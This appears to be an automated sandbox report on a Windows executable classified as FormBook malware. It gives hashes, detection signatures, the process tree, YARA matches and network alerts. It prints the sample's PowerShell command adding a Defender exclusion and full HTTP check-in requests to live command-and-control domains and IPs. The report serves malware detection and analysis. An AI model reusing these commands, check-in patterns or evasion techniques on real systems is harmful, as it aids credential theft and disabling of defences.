Windows Analysis Report
r9856_7.exe

Overview

General Information

Sample name: r9856_7.exe
Analysis ID: 1509673
MD5: 6abb344635c64e538866f0e7386e2568
SHA1: 072c594929e33401604f6e4f184f2ed78b4e38c2
SHA256: a5273ce78432a8f34e120ecd96da8681ece96ce8b54cc6eec68c0088c483b8ec
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • r9856_7.exe (PID: 6648 cmdline: "C:\Users\user\Desktop\r9856_7.exe" MD5: 6ABB344635C64E538866F0E7386E2568)
    • powershell.exe (PID: 5948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7232 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • r9856_7.exe (PID: 5952 cmdline: "C:\Users\user\Desktop\r9856_7.exe" MD5: 6ABB344635C64E538866F0E7386E2568)
      • NhrnLLOsLetD.exe (PID: 2816 cmdline: "C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 7396 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • NhrnLLOsLetD.exe (PID: 5428 cmdline: "C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7660 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x90325:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x78504:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ba00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13bdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.r9856_7.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.r9856_7.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.r9856_7.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.r9856_7.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2eef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r9856_7.exe", ParentImage: C:\Users\user\Desktop\r9856_7.exe, ParentProcessId: 6648, ParentProcessName: r9856_7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", ProcessId: 5948, ProcessName: powershell.exe
            Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\r9856_7.exe", ParentImage: C:\Users\user\Desktop\r9856_7.exe, ParentProcessId: 6648, ParentProcessName: r9856_7.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe", ProcessId: 5948, ProcessName: powershell.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-11T22:54:47.970266+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59660 | 154.23.184.218 | 80 | TCP
            2024-09-11T22:55:11.746854+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59665 | 152.53.38.0 | 80 | TCP
            2024-09-11T22:55:25.554231+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59669 | 23.225.34.75 | 80 | TCP
            2024-09-11T22:55:38.710839+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59673 | 3.33.130.190 | 80 | TCP
            2024-09-11T22:55:52.282540+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59677 | 65.108.194.49 | 80 | TCP
            2024-09-11T22:56:06.275752+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59681 | 208.91.197.13 | 80 | TCP
            2024-09-11T22:56:20.096078+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59685 | 76.223.113.161 | 80 | TCP
            2024-09-11T22:56:33.495089+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59689 | 172.67.221.5 | 80 | TCP
            2024-09-11T22:56:47.204569+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59693 | 162.240.81.18 | 80 | TCP
            2024-09-11T22:57:00.498635+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59697 | 162.0.213.94 | 80 | TCP
            2024-09-11T22:57:13.948673+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59701 | 84.32.84.32 | 80 | TCP
            2024-09-11T22:57:27.510291+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59705 | 35.214.33.204 | 80 | TCP
            2024-09-11T22:57:40.658093+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59709 | 3.33.130.190 | 80 | TCP
            2024-09-11T22:57:54.255424+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59713 | 199.59.243.226 | 80 | TCP
            2024-09-11T22:58:16.140788+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59717 | 188.114.96.3 | 80 | TCP
            2024-09-11T22:58:25.786115+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59718 | 154.23.184.218 | 80 | TCP
            2024-09-11T22:58:38.909718+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59722 | 152.53.38.0 | 80 | TCP
            2024-09-11T22:58:52.842736+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 59726 | 23.225.34.75 | 80 | TCP

            AV Detection

            Source: r9856_7.exe | Avira: detected
            Source: r9856_7.exe | ReversingLabs: Detection: 63%
            Source: Yara match | File source: 4.2.r9856_7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.r9856_7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000A.00000002.3819616771.0000000005790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3814636259.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3816875853.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1543385980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1545185374.0000000001500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3814284563.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.3816533297.0000000003160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1545720101.0000000002060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: r9856_7.exe | Joe Sandbox ML: detected
            Source: r9856_7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: r9856_7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NhrnLLOsLetD.exe, 00000007.00000002.3815465692.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3815330168.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: cmdkey.pdbGCTL source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r9856_7.exe, r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: djdH.pdb source: r9856_7.exe
            Source: Binary string: cmdkey.pdb source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: djdH.pdbSHA256L source: r9856_7.exe
            Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 8_2_00A1BF60 FindFirstFileW,FindNextFileW,FindClose | 8_2_00A1BF60
            Source: C:\Users\user\Desktop\r9856_7.exe | Code function: 4x nop then jmp 072DD3B2h | 0_2_072DCBDC
            Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 4x nop then xor eax, eax | 8_2_00A09AB0
            Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 4x nop then pop edi | 8_2_00A0DBED
            Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 4x nop then mov ebx, 00000004h | 8_2_033304E8

            Networking

            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59660 -> 154.23.184.218:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59673 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59669 -> 23.225.34.75:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59665 -> 152.53.38.0:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59689 -> 172.67.221.5:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59709 -> 3.33.130.190:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59693 -> 162.240.81.18:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59701 -> 84.32.84.32:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59677 -> 65.108.194.49:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59697 -> 162.0.213.94:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59713 -> 199.59.243.226:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59717 -> 188.114.96.3:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59726 -> 23.225.34.75:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59718 -> 154.23.184.218:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59685 -> 76.223.113.161:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59722 -> 152.53.38.0:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59681 -> 208.91.197.13:80
            Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:59705 -> 35.214.33.204:80
            Source: DNS query: www.maya24.xyz
            Source: DNS query: www.zimra.xyz
            Source: DNS query: www.personal-loans-jp8.xyz
            Source: Joe Sandbox View | IP Address: 162.240.81.18
            Source: Joe Sandbox View | IP Address: 162.0.213.94
            Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox View | ASN Name: ACPCA
            Source: Joe Sandbox View | ASN Name: AMAZON-02US
            Source: Joe Sandbox View | ASN Name: NTT-LT-ASLT
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | HTTP traffic detected:
                GET /3ozz/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=XDfkmZV0UpreXJRL4a+kMc+s40ElyBknavgDq4xpV4itK9/GJYtr4NsiaYcm7ir36wtKh4I9XU6sRfj+cMnrz2p6V2IZ5AA5gzUpK7TVcpLZf4ygGQ5VljQGU5XXJlbNz7qQtdD+VX81 HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.57ddu.top
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /7f48/?XvhP6L=Y/V9HWeQI6V9wDpav31Zmzk5MY4+Ou2xQiPhqUb5lc+p8ROSXtAF44jgGkfnSdbIjMV3KY+ys+uzmsyZr9wUrSReS7kDqE3Vwy5Stw7V8E2w1yWugNHB1ko6qS7b9UC1jiexBCRL4rzt&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.nuv3.top
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /u0n6/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=TnXPJRFedBjcAOKsz8A4RrjZJ/J8mpS0RRmNukYQVSavKw+Pr3ZL00k0+s6r1anvS9TkkUZZGYzdsNqRXNwCKrFNx4FeTSUtckB8ipahHKvydrXWZ9yissqQQy/l7XTEZmUeENIc2eR0 HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.bashei.top
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /squz/?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.tigre777gg.online
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.maya24.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /pa4w/?XvhP6L=dKMHTeotdxQA3vuiSRDg588JUBKwJbza89FzR4k2/BlHdZNbjG9srDVj4iYsPfHZhZaT/x4F9RFLyq608nYJAYQb5LXQOtEiJ4lw7e+xANqPS8JKy934Fa9hsYgKS5KVWYuJXZeSCWTj&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.hiretemp.net
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /otqc/?XvhP6L=jk/2fo7CpY6PXlaYArzRtoo0AVLLUFDN/Jq+vkOaZ+fPrhUhiTNdX0aA543JRHsuzYf7ebB3TDQsHlnmoSav9wzbQDyRMAafsyNd6ddZozZF1KxmmUfcLkKv5xld9bF92o+2nx1DI9Jm&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.justlivn.net
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /d4mx/?XvhP6L=dY+cYSKR0CxOBgdKC/uIXP8qwtWtKpkmZkr6gQOthvr2txBeH3FPzsd2b0Ib6yOB9b4SVKkLzFRco8LgeUNZml6ApuBXHFQ5XcnL1KhmECBVWCNPjbmPvAwvE3fQeXhC94EGXV5DutCK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.hemistryb.online
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /a5gd/?XvhP6L=PudvrHhxWdfxtGGhQSPM4Nv1Dcz9A9OmcQNSz/CJh1KNnxIb2QXQvP51CacMS4xZciC0s5SL/yVXPvg6yOeNO+2G0wSJvvCXF5bk0r60CWn1bzRkQZzJoS1GIdNZy2RK3STysnFtIBWS&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.jeandreo.store
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /knrh/?XvhP6L=YgggYvzCIY9cxyt1YCa2G3R12OneF5/58fBG84NSPGW4/awNicu/ZN4HtGSklex6REK8bsR/OR3Y+MJqd7/88rmQQgGzhJF4KytM6w66NwsLhFIcz78jdTwuasaid4VzQcobuCXl81HP&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.zimra.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /7fgk/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=jsI13KUmBZ1T5rh+bHmke0O+W3Z/A6nMw4DpVk3nSlnNNLSGuDQ/FPhySwGHE5L/lacb6zZ1lT+tB+A3kLGRxOtsHOzzZCR5pN3lBpoImaPzbOWkADZ6ueCTs7gp0g7tISQqu/NYQOSA HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.legitima.legal
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /i118/?XvhP6L=l78tjT99nfWmEsVDs1FvFZ9WuYye9a70xFpF/w9BItZXEYkJuJfqp9pdvrQptbQ2LO1yeOIECnfIu7s7S7+7Q3i1eKl3stoZZ1arBng6e4IDYKgW1i7918V1fhSLuSwuhzNanlWnB/aN&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.autochemtools.com
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /ufia/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=zNK014zjWgi1a3eyzMMm2nz3fX543AdpgfXUQgxXNtpCBS2vIzBVVMdfG2b0NYPX0xafoGIjW7/mcYzzWPwRhMM12G8tl2rgt13dQBJV/fCpNzfTXyNrbuK5i1kogSU8patx4VfAZ+EZ HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.thewhitediamond.org
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /6ycu/?XvhP6L=48n5Gh86tilVUpEn3bMYkhqvO5up5zkqTgQXBFakbnd6q0dGuIyBO7mD/1tgIewitYTTRw7cds46U990bsqw3nwlebvgtAe1RUGRB2MI0lkiowd2cOo1HMJgELRUlBXSLJgYq2E6HCqo&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.personal-loans-jp8.xyz
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | HTTP traffic detected:
                GET /x5bi/?XvhP6L=JYCf+ZJomMv21wL/A/ZbfBFGIgJsU/wUGcnjHUxnhitVEbVd5ES97oujxAxH+SE+IOTeV6meH+QeTEXNSn72wswjM27hcTXz9HzWUY9luI/8WXXgEAe/tU5ADSlVG/RuaZzqE+6xfFdK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                Accept: */*
                Accept-Language: en-US,en;q=0.9
                Host: www.chinaen.org
                Connection: close
                User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
            Source: global traffic | DNS traffic detected: DNS query: time.windows.com
            Source: global traffic | DNS traffic detected: DNS query: www.57ddu.top
            Source: global traffic | DNS traffic detected: DNS query: www.nuv3.top
